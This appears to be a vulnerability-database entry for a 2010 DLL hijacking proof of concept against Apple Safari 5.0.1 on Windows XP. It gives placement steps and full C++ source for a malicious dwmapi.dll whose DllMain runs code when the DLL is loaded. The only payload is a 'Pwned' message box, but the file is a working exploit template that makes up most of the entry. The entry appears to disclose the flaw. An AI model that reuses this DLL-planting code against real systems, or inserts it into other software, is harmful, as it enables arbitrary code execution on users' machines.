Apple Safari 5.0.1 - 'dwmapi.dll' DLL Hijacking

🗓️ 25 Aug 2010 00:00:00Reported by SecfenceType

Apple Safari 5.0.1 - 'dwmapi.dll' DLL Hijacking on Windows XP SP

/*
Version: Safari 5.0.1
Tested on: Windows XP SP3
Author : Secfence

Exploit By:
Vinay Katoch,
Secfence Technologies
www.secfence.com
http://twitter.com/secfence

Place a .htm .mht .mhtml .xht .xhtm .xhtl file and dwmapi.dll in same folder
and run file in safari.

Code for dwmapi.dll:
*/

/*----------*/

/* wintab32.cpp */

#include "stdafx.h"
#include "dragon.h"

void init() {
MessageBox(NULL,"Pwned", "Pwned!",0x00000003);
}


BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
    }
    return TRUE;
}

/*----------*/

25 Aug 2010 00:00Current

7.4High risk

Vulners AI Score7.4

Apple Safari 5.0.1 - &#039;dwmapi.dll&#039; DLL Hijacking

Apple Safari 5.0.1 - 'dwmapi.dll' DLL Hijacking